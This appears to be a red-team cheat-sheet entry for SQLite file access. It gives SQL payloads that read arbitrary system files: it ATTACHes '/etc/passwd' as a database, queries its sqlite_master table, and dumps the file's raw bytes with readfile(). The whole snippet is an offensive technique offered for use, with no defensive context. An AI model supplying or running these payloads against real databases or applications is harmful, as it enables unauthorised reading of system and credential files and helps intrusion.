-- Read an arbitrary file by attaching it as a DB
ATTACH '/etc/passwd' AS hacked;
-- Attempt to read content (if file happens to be valid SQLite header)
SELECT * FROM hacked.sqlite_master;
-- Or dump raw bytes (hex)
SELECT quote(readfile('/etc/passwd'));
RED TEAM / SQL / SQLITE / FILE ACCESS